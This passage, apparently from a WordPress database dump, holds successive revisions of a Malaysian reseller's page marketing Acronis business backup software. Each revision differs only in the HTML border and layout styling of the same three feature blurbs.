06:31:26','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3144,1,'2019-09-18 14:33:04','2019-09-18 06:33:04','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" border-style: dotted;>\r\n<div class=\"col col-4\" >\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:33:04','2019-09-18 06:33:04','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3143,1,'2019-09-18 14:32:20','2019-09-18 06:32:20','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\" border-style: dotted;>\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" border-style: dotted;>\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:32:20','2019-09-18 06:32:20','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3146,1,'2019-09-18 14:34:35','2019-09-18 06:34:35','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" border-style: dotted;>\r\n<div class=\"col col-4\" >\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:34:35','2019-09-18 06:34:35','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3148,1,'2019-09-18 14:35:54','2019-09-18 06:35:54','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:35:54','2019-09-18 06:35:54','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3147,1,'2019-09-18 14:35:24','2019-09-18 06:35:24','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: dotted;\">\r\n<div class=\"col col-4\" >\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:35:24','2019-09-18 06:35:24','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3150,1,'2019-09-18 14:37:09','2019-09-18 06:37:09','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: dotted;\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:37:09','2019-09-18 06:37:09','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3149,1,'2019-09-18 14:36:19','2019-09-18 06:36:19','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\" style=\"border-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:36:19','2019-09-18 06:36:19','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3151,1,'2019-09-18 14:38:20','2019-09-18 06:38:20','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: dotted;\">\r\n<div class=\"col col-4\" style=\"border-right-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:38:20','2019-09-18 06:38:20','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3152,1,'2019-09-18 14:38:46','2019-09-18 06:38:46','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: dotted;\">\r\n<div class=\"col col-4\" style=\"border-right-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:38:46','2019-09-18 06:38:46','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3153,1,'2019-09-18 14:39:17','2019-09-18 06:39:17','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: solid;\">\r\n<div class=\"col col-4\" style=\"border-right-style: solid;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: solid;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: solid;>\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:39:17','2019-09-18 06:39:17','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3156,1,'2019-09-18 14:41:53','2019-09-18 06:41:53','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:41:53','2019-09-18 06:41:53','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3155,1,'2019-09-18 14:40:48','2019-09-18 06:40:48','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: solid; border-color: #000;\">\r\n<div class=\"col col-4\" style=\"border-right-style: solid; border-color: #000;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: solid; border-color: #000;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:40:48','2019-09-18 06:40:48','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3154,1,'2019-09-18 14:40:22','2019-09-18 06:40:22','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border-style: solid; border-color: #000;\">\r\n<div class=\"col col-4\" style=\"border-right-style: solid; border-color: #000;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: solid; border-color: #000;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right-style: solid; border-color: #000;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:40:22','2019-09-18 06:40:22','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3157,1,'2019-09-18 14:42:28','2019-09-18 06:42:28','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:42:28','2019-09-18 06:42:28','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3158,1,'2019-09-18 14:43:20','2019-09-18 06:43:20','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:43:20','2019-09-18 06:43:20','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3159,1,'2019-09-18 14:44:22','2019-09-18 06:44:22','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:44:22','2019-09-18 06:44:22','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3160,1,'2019-09-18 14:45:04','2019-09-18 06:45:04','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware &nbsp;</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:45:04','2019-09-18 06:45:04','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3161,1,'2019-09-18 14:45:39','2019-09-18 06:45:39','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n</center>\r\n<h3>Active Ransomware Protection</h3>\r\n<div style=\"margin-bottom: 1%;\">Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\r\n<div>\r\n\r\n<center>\r\n<img 